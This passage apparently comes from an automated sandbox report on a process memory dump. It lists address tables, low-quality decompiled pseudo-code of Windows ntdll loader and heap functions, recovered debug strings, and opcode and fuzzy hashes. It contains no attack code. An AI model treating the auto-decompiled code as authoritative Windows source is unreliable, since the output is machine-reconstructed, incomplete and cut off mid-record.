                                  0x018ba2e4
                                  0x01901d69
                                  0x01901d6b
                                  0x01901d76
                                  0x01901d76
                                  0x01901d76
                                  0x01901d91
                                  0x01901d91
                                  0x018ba2ea
                                  0x018ba2f0
                                  0x018ba2f5
                                  0x01901da8
                                  0x01901dad
                                  0x01901dad
                                  0x018ba2fd
                                  0x018ba300
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                  • API String ID: 2994545307-2586055223
                                  • Opcode ID: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
                                  • Instruction ID: e63587cfd8a1de468d961eb1a77c1e6ee5d0ca8cd4cc3abb1b50e1039c7b3791
                                  • Opcode Fuzzy Hash: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
                                  • Instruction Fuzzy Hash: 3651F4322056819FE712EB6CC884FA777E8EB80B54F190568F959CB3D1D764EA40CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E018C8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x198d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1988464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1985780 & 0x00000003) != 0) {
							E01915510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1985780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E018DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1987984; // 0x1432b30
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1988464; // 0x75150110
					 *0x198b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E018C9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1985780 & 0x00000005) != 0) {
						_push(_t49);
						E01915510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                  0x018c8e0f
                                  0x018c8e16
                                  0x018c8e19
                                  0x018c8e1b
                                  0x018c8e21
                                  0x018c8e7f
                                  0x018c8e85
                                  0x01909354
                                  0x0190936c
                                  0x01909371
                                  0x0190937b
                                  0x01909381
                                  0x01909381
                                  0x0190937b
                                  0x018c8e9d
                                  0x018c8e9d
                                  0x018c8e29
                                  0x018c8e2c
                                  0x018c8e38
                                  0x018c8e3e
                                  0x018c8e43
                                  0x018c8eb5
                                  0x018c8eb9
                                  0x019092aa
                                  0x019092af
                                  0x019092e8
                                  0x019092e8
                                  0x019092af
                                  0x018c8eb9
                                  0x018c8e45
                                  0x018c8e53
                                  0x018c8e5b
                                  0x018c8e5f
                                  0x018c8e78
                                  0x018c8e78
                                  0x018c8e7d
                                  0x018c8ec3
                                  0x018c8ecd
                                  0x018c8ed2
                                  0x018c8ed2
                                  0x018c8ec5
                                  0x018c8ec5
                                  0x00000000
                                  0x018c8e7d
                                  0x018c8e67
                                  0x018c8ea4
                                  0x0190931a
                                  0x00000000
                                  0x00000000
                                  0x01909320
                                  0x018c8ea4
                                  0x018c8e70
                                  0x01909325
                                  0x01909340
                                  0x01909345
                                  0x01909345
                                  0x018c8e76
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Strings
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 01909357
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 0190933B, 01909367
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0190932A
                                  • LdrpFindDllActivationContext, xrefs: 01909331, 0190935D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  • Opcode ID: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                                  • Instruction ID: 57f4519c4c79b1ce37f524deda989cc4fffb860143210e900c7f3b5bd96e751e
                                  • Opcode Fuzzy Hash: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                                  • Instruction Fuzzy Hash: 33411E31A803199FEB36AA5CC888A397764AB43F58F06416DE508D7192E770EF80CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019549A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                  • API String ID: 2994545307-336120773
                                  • Opcode ID: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
                                  • Instruction ID: 7634f567299893e3034d005b7b6c428e1a16696b42b82a6bedd463509256956f
                                  • Opcode Fuzzy Hash: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
                                  • Instruction Fuzzy Hash: 1A312471200500EFD7E1DB9DC889F67B7A8EF01B21F184469F909EB251F670EA80CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018B99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-3178619729
                                  • Opcode ID: 6b82f59c995e8603e10fa505126a483ed134e58a0827932ebfb2278ba207ba26
                                  • Instruction ID: 36b65855d1971f1c2865f87eb84b76a57ef275caf513ad81f245b015e7632b47
                                  • Opcode Fuzzy Hash: 6b82f59c995e8603e10fa505126a483ed134e58a0827932ebfb2278ba207ba26
                                  • Instruction Fuzzy Hash: C1220770A002469FEB26CF1CC484B7ABBF9EF45704F188569E54ACB382E775DA80CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018A8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018F9C18
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 018F9C28
                                  • LdrpDoPostSnapWork, xrefs: 018F9C1E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 2994545307-1948996284
                                  • Opcode ID: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                                  • Instruction ID: 124877fc518c5a2367806108fa23fa2b66f981099694130e6f0b0af8eaa95717
                                  • Opcode Fuzzy Hash: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                                  • Instruction Fuzzy Hash: 3291F671A0021A9FFB18DF5DD480A7A77B5FF45315B954069EA05DB241DB30EF01CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018CAC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 0190A0AD
                                  • HEAP: , xrefs: 0190A0BA
                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0190A0CD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                  • API String ID: 0-1340214556
                                  • Opcode ID: abfa30671d3d26bca8875a13ef3bf5645e426b066078eb3032c1eaa3bf7c1d73
                                  • Instruction ID: ee5dec22ff26fc21ab5b26074e9e6f624656066cedfe428fd162f5964462f289
                                  • Opcode Fuzzy Hash: abfa30671d3d26bca8875a13ef3bf5645e426b066078eb3032c1eaa3bf7c1d73
                                  • Instruction Fuzzy Hash: 0181E731604649EFD726CB6CC884FA9BBF8FF05B15F0445A9E645C7292E774EA40CB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  • Opcode ID: 82692dfc3d3afaba037f14ad89ed9d65df6b20aae0e50e30198d7f1948cd20aa
                                  • Instruction ID: c80112081743f4f966be7eb3b9c664d6227de5d3607632eeee0dd5d7049c43df
                                  • Opcode Fuzzy Hash: 82692dfc3d3afaba037f14ad89ed9d65df6b20aae0e50e30198d7f1948cd20aa
                                  • Instruction Fuzzy Hash: 1361D070600605DFDB29DF28C484BAABBE5FF45304F18856EE849CB392D770EA81CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018A7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                  Download Yara Rule
                                  Strings
                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 018F9891
                                  • minkernel\ntdll\ldrmap.c, xrefs: 018F98A2
                                  • LdrpCompleteMapModule, xrefs: 018F9898
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                  • API String ID: 0-1676968949
                                  • Opcode ID: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                                  • Instruction ID: 34b6712a80e575cbdccda5a8111dacd282351554daed2dfe6d83abdae06b8030
                                  • Opcode Fuzzy Hash: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                                  • Instruction Fuzzy Hash: E851E031A0078A9BFB21CB6CC984B6A7BE4AB41B18F840599EB51DB3D1D735EF00C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019423E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                  Download Yara Rule
                                  Strings
                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0194256F
                                  • HEAP[%wZ]: , xrefs: 0194254F
                                  • HEAP: , xrefs: 0194255C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                  • API String ID: 0-3815128232
                                  • Opcode ID: 5c75163820776478bd95106fa6423da01846c522a86dd7c2d3d9d9c016decbfe
                                  • Instruction ID: 82b9ab84a7f3ff8b1a02ec26dcda3776372125f6aef47d7320f9dfff8919a693
                                  • Opcode Fuzzy Hash: 5c75163820776478bd95106fa6423da01846c522a86dd7c2d3d9d9c016decbfe
                                  • Instruction Fuzzy Hash: 025101342042508BE334DB2EE884F727BF5FB48B46F554C59F8CACB285E669D846DB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0189E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                  Download Yara Rule
                                  Strings
                                  • InstallLanguageFallback, xrefs: 0189E6DB
                                  • @, xrefs: 0189E6C0
                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0189E68C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                  • API String ID: 0-1757540487
                                  • Opcode ID: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                                  • Instruction ID: 9411817b6550f3184ed7d93474d7a0333b8afc6b411e900f1cabd68c891a1fd0
                                  • Opcode Fuzzy Hash: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                                  • Instruction Fuzzy Hash: 0B517FB26083469BDB14DF68C480A6BB7E8BF98715F45092EFA85D7240F734DB04C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: 968fc38f32fd7f3fbe88eb097aeb850412b9e1dce76c197053c53253eb99d571
                                  • Instruction ID: bfca9d972bd30f19b70608570d3a9a9d9706b22a788ee688b84f8f722f3c2da8
                                  • Opcode Fuzzy Hash: 968fc38f32fd7f3fbe88eb097aeb850412b9e1dce76c197053c53253eb99d571
                                  • Instruction Fuzzy Hash: 5611E6317145069FEB29DB19C4C4FBAB7A5EF40B24F28846DE00ACB351E674DA40C751
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0195E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction ID: 05dd41b8ed577af8b5584a9be9a998602f2c90e770a24d944b3154d97e6e957b
                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction Fuzzy Hash: 4B91AF712043429FE764CE29C840B1BBBE9AF84714F14892DFA99DB280E771EA04CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019151BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                                  • Instruction ID: cb63c461c44a867cd0bd6994ccb18b0006c9f16bf93bd85cc6fb0ca09a0d456f
                                  • Opcode Fuzzy Hash: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                                  • Instruction Fuzzy Hash: F1517E71E00609DFEB25DFA8C880AADBBF8FF89700F16442DE609EB255D7719A41CB10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018BB9A5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 885266447-0
                                  • Opcode ID: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                                  • Instruction ID: 8db232d556e0cebf4fde681842c3f093cdae240f07d6bca3b571462d14bf3075
                                  • Opcode Fuzzy Hash: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                                  • Instruction Fuzzy Hash: A0515671A09341CFC721CF2CC4C092ABBE9BB88714F54896EEA95D7355D770EA44CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0189B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: _vswprintf_s
                                  • String ID:
                                  • API String ID: 677850445-0
                                  • Opcode ID: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                                  • Instruction ID: ce5285865a2780fa3f1b0083e058a57bce231662fac3dd41bdef87bd2afef046
                                  • Opcode Fuzzy Hash: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                                  • Instruction Fuzzy Hash: B851E171E1025A8EDF35CF68C844BAEBBB0AF01714F1442AEDA59EB292D7704A45CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: PATH
                                  • API String ID: 0-1036084923
                                  • Opcode ID: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                                  • Instruction ID: 0cde5366ca1c58314600aa25a42a2a22481bf368ef8d6ccec709f9fb47ff9775
                                  • Opcode Fuzzy Hash: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                                  • Instruction Fuzzy Hash: 9AC17D75D00219DBDB25DFACD880AADBBB6FF48B44F49402DE505EB290D734EA42CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018CFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                  Download Yara Rule
                                  Strings
                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0190BE0F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                  • API String ID: 0-865735534
                                  • Opcode ID: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
                                  • Instruction ID: 409cd93add65739b97390d99a51716f2e49fad76829f47b14bc450a1928512df
                                  • Opcode Fuzzy Hash: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
                                  • Instruction Fuzzy Hash: 95A10575B006168FFB26DB6CC450B7AB7A6AF44B14F04456EEB0ACB681DB34DE01CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01892D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Re-Waiting
                                  • API String ID: 0-316354757
                                  • Opcode ID: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
                                  • Instruction ID: 0ff1b130eab411ce3d4b9e3af4227e81f1072e0ed47c1b9616c6a145b49951f7
                                  • Opcode Fuzzy Hash: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
                                  • Instruction Fuzzy Hash: 01610671A00649AFEB32DF6CC888B7E7BE6EB45718F180659E615DB2C2C7349B008781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01960EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
                                  • Instruction ID: 6091ea35545fdb4a94084e44e8140e8ecd5856ea3192f874c8c17f67712c6137
                                  • Opcode Fuzzy Hash: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
                                  • Instruction Fuzzy Hash: B851AE713043829FE725DF28D980B1BBBE9EBC4714F08492CFA9A97290D770E805C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018CF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                  • Instruction ID: 5aa882849b252696784207e0e6f3c5e54acb1e63a6930c5ea86d123a1466bfe6
                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                  • Instruction Fuzzy Hash: 66517B715007159FD321DF18C840A6BBBF9BF88710F00492EFA96C7690E774E944CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01913540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: 81aea42c6b4a58548f2176ea7dc0aa0aaa43932d66ce83c4fed2e6f1e7713eb8
                                  • Instruction ID: aa6f18ccc8101631416b7888732731e531c8ac971850e3267508d2e71950ad28
                                  • Opcode Fuzzy Hash: 81aea42c6b4a58548f2176ea7dc0aa0aaa43932d66ce83c4fed2e6f1e7713eb8
                                  • Instruction Fuzzy Hash: 4C4133B1D0062D9BDB21DA54CC85F9EB77CAB44768F0045A5EA0DAB240DB309F888F95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019605AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                  • Instruction ID: 9c94b693a90e43bc64b9675ed46cc147436aa2d1349d3b54eb993dd44d087442
                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                  • Instruction Fuzzy Hash: 0731C0326043466BE720DE29CD85F9A7B9DBBC4754F184229FA58AB2C0D770ED14CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01913884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  • Opcode ID: fcb7f2b9d5a06e3eaf436c456e174efd45faf57d07424f37126ac934e4eb3a9c
                                  • Instruction ID: 8356551936df8b447f58e8eb8c4deb9af734fcf30d4d005b14836572e6faf5bb
                                  • Opcode Fuzzy Hash: fcb7f2b9d5a06e3eaf436c456e174efd45faf57d07424f37126ac934e4eb3a9c
                                  • Instruction Fuzzy Hash: 8431F472D0060EEFEB16DA5CC945D6BBB79FB80730F014169E919A7244D7309F40C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018CD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 53ce8b0564b485c13b6e87bbece3317daafb414ea3b66a3ba7717a35bb26d95d
                                  • Instruction ID: eef6c4e756287343409da42fcf3f65814b504c60b7bd9eb39ff1636c21a4d0ce
                                  • Opcode Fuzzy Hash: 53ce8b0564b485c13b6e87bbece3317daafb414ea3b66a3ba7717a35bb26d95d
                                  • Instruction Fuzzy Hash: 84317EB15083459FC311EF68C9809ABBBE8EB95B58F000A2EF995C3251E634DE04CBD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018A1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: WindowsExcludedProcs
                                  • API String ID: 0-3583428290
                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                  • Instruction ID: a33598813d55644a9b92a22f86c02ed58675cddc10b6dbbd8a8b1f15d33f6528
                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                  • Instruction Fuzzy Hash: 3121073A500229EBFB229A5DC884F9BBBADEF91B54F154425FE04CB200D630DF00D7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Actx
                                  • API String ID: 0-89312691
                                  • Opcode ID: b15f9f6834c29866325dc1be86fed4ca8998cf5f82887a021da949602704adab
                                  • Instruction ID: 607d4d6c51d26aaebcc1e9afe97864a1c212ce75d89abde95c2880d185bfec23
                                  • Opcode Fuzzy Hash: b15f9f6834c29866325dc1be86fed4ca8998cf5f82887a021da949602704adab
